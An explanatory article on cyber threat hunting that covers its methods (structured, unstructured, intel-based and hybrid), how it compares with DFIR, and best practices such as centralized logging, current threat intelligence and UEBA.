Threat hunting is a proactive process for locating cyber attackers in computing environments. It typically involves human threat hunters and automated threat hunting processes. Threat hunters assume attackers have already breached your defenses and got into the network system.
Threat hunting does not typically involve responding directly to threats. Rather, threat hunters collect information on ongoing attacks and attempt to track down the attackers and notify the incident response team of the incident. Threat hunters may assist these response efforts or only provide information.
An important role of threat hunting is to help detect advanced persistent threats (APTs)—long-term attacks that enable actors to hide undetected. Due to the sophistication of APT attackers, they can often remain hidden from traditional security defenses. Actors launch APT attacks to achieve specific objectives, such as data exfiltration at a large scale, obtaining credentials for lateral movement, and obtaining confidential information.
How Threat Hunting Works
The success of threat hunting programs is based on the availability of rich data from the IT environment. Organizations must first deploy enterprise security systems to collect data. This information can be explored by threat hunters and can provide valuable clues about the presence of attackers.
Cyber threat hunters introduce a human factor into corporate security to complement automated systems. They can monitor, detect, and neutralize threats before they become serious problems. A threat hunter could be a security analyst within the company's IT department but could also be an external analyst.
There are several threat hunting methodologies, but all of them look for the unknown in the environment. They go beyond traditional detection technologies based on alerts from a Security Information and Event Management (SIEM). Threat hunters examine security data in depth, searching for hidden malware, suspicious patterns of activity, and vulnerabilities that have not been identified by regular scanning. Once they identify a threat, they can help remediate security weaknesses to prevent threats from recurring.
Types of Threat Hunting
The threat hunting process begins with a hypothesis based on a trigger or security data. This hypothesis helps investigate possible risks in-depth using structured, unstructured, or situational hunting investigation types.
Structured hunting involves using an attacker’s tactics, techniques, and procedures (TTPs) and an indicator of attack (IoA) to hunt for a threat. It aligns the hunt around specific TTPs associated with a threat actor, typically using the MITRE Adversary Tactics Techniques and Common Knowledge (ATT&CK) framework and the PRE-ATT&CK and enterprise frameworks. The goal is to ensure hunters can identify the threat even before the attacker causes any damage.
Unstructured hunting involves using a trigger, which may be one of many indicators of compromise (IoC), to launch an investigation. The trigger typically suggests that hunters should look for pre-detection and post-detection patterns. The goal is to enable hunters to research as far back as possible, including the data retention and previously associated offenses.
Intel-based hunting involves using IoCs from threat intelligence sources as inputs to initiate reactive hunting. The process reacts to the input and follows predefined rules established by the threat intelligence and security information and event management (SIEM).
Intel-based hunting may use various input types provided by intelligence sources like computer emergency response teams (CERTs), including hash values, domain names and networks, host artifacts, and IP addresses.
Most sources let you export automated alerts and input the data into your SIEM as structured threat information eXpression (STIX) and trusted automated exchange of intelligence information (TAXII). Next, the threat hunter starts investigating activities that have occurred before and after the alert to locate indicators of compromise.
Hybrid threat hunting involves combining structured, unstructured, and intel-based hunting together to enable you to customize the hunt. It typically employs industry-based hunting alongside situational awareness and specified hunting requirements. You can customize the hunt using data about geopolitical issues, for example, and use a hypothesis as the trigger.
Threat Hunting vs. DFIR
Digital forensics and incident forensics (DFIR) is a field focused on the identification, remediation, and investigation of cybersecurity incidents. Digital forensics involves collecting, storing, and analyzing forensic evidence to obtain a complete and detailed understanding of an event. Incident response, on the other hand, aims to detect, contain, and eradicate an attack.
The combination of digital forensics and incident response can help keep a business running while identifying and resolving security breaches. It provides critical evidence that the organization can use to prosecute criminals or to support cyber insurance claims.
Threat hunting and DFIR are two distinct approaches at opposite ends of the cyber attack timeline. Threat hunting is a preventative technique used to identify new or currently active threats. When done right, it enables early detection of threats and preventive, remedial action. Digital forensics, on the other hand, is critical to shaping post-incident responses, limiting damage, initiating corrective actions, and improving future responses. Therefore, both are essential components of an organization's security lifecycle.
Best Practices for Threat Hunting
Here are some best practices to help you implement more effective threat hunting.
Keep Your Internal Systems Transparent
Threat hunters must understand the environment they’re protecting to detect anomalies. They require visibility over your architecture, traffic, and user privileges, allowing them to establish a baseline of normal behavior against which they can compare unusual actions. Many suspicious actions require context to identify.
Transparency also requires accessing system data, typically as logs. Collect logs using existing security tools and centralize them for simpler analysis.
Ensure Threat Intelligence Is Up-to-Date
Having up-to-date tools and processes is essential for identifying advanced attackers who can slip past your security apparatus. You cannot rely on outdated threat data, especially since you probably acted on it already. Your system is likely protected against old threats.
Threat hunting should focus on new or unknown attacks, such as zero-day exploits (vulnerabilities you haven’t patched yet). You should follow vulnerability reports to keep track of newly discovered threats.
Leverage AI and UEBA
User and Entity Behavior Analytics (UEBA) is a powerful AI-based security tool that helps identify suspicious behavior across your network. However, you must have mature logging and incident response policies to leverage UEBA and other AI tools effectively. The algorithms must have a baseline of normal behavior to analyze network activity.
Before using UEBA, you must collect sufficient data to define the normal activity and strike a balance between slightly unusual and outright suspicious behavior. You also need to avoid generating too many false positives.
Threat hunting can help your organization transition from a passive information security model, in which the organization only reacts when an attack occurs, to a proactive model in which defenders actively seek attackers lurking in the network or open doors that could allow attackers to enter.
I provided several best practices that can help you get started with threat hunting and practice it more effectively:
- Keep systems transparent—threat hunters must have a clear view of the internal network and understand the business relevance of critical systems.
- Ensure threat intelligence is up to date—threat hunters should not look for yesterday’s threats. They should leverage the latest threat intelligence information to seek out emerging and unknown threats.
- Leverage AI and UEBA—threat intelligence requires complex data analysis, which can be augmented by AI capabilities offered by modern security analytics tools.
I hope this will be useful as you explore the use of threat hunting to make the move to offensive security.